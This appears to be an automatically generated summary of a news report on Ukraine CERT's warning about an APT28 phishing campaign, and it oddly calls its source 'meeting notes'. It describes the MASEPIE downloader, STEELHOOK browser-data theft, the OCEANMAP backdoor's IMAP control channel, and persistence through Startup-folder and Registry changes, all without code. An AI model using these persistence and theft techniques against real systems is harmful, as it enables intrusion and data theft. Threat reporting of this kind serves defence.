December 28, 2023 at 12:46PM
Ukraine’s CERT warns of a new phishing campaign by APT28, a Russian hacker group known for targeting government and Western entities. The attack, occurring between December 15 and 25, 2023, deploys a new Python malware downloader, ‘MASEPIE,’ via phishing emails. APT28 also uses various tools for data theft and network reconnaissance, executing rapid and coordinated attacks.
From the meeting notes, the following key takeaways can be summarized:
– Ukraine’s Computer Emergency Response Team (CERT) has warned about a new phishing campaign that allowed Russia-linked hackers to quickly deploy previously unseen malware on a network within one hour.
– APT28, also known as Fancy Bear or Strontium, is a Russian state-sponsored threat actor targeting government entities, businesses, universities, research institutes, and think tanks in Western countries and NATO organizations. They use phishing campaigns and exploit zero-day vulnerabilities in widely used software.
– The latest campaign targeting Ukraine involved phishing emails urging recipients to click on a link supposedly to view an important document, which then redirected them to malicious web resources employing JavaScript to drop a Windows shortcut file that launches PowerShell commands to trigger an infection chain for a new Python malware downloader called ‘MASEPIE.’
– MASEPIE establishes persistence on infected devices by modifying the Windows Registry and adding a deceptively named LNK file to the Windows Startup folder. It primarily functions to download additional malware and steal data.
– APT28 also uses a set of PowerShell scripts named ‘STEELHOOK’ to steal data from Chrome-based web browsers, as well as the ‘OCEANMAP’ backdoor for executing base64-encoded commands via cmd.exe.
– OCEANMAP establishes persistence on the system by creating a .URL file in the Windows Startup folder and uses the Internet Message Access Protocol (IMAP) as a control channel to receive commands discreetly.
– Other tools deployed in the attacks for network reconnaissance and lateral movement include IMPACKET, a collection of Python classes for working with network protocols, and SMBEXEC, which enables remote command execution.
– These tools are deployed in compromised systems within an hour from the initial compromise, indicating a rapid and well-coordinated attack.
These takeaways provide a clear understanding of the nature and tactics of the cyber attack on Ukraine as described in the meeting notes.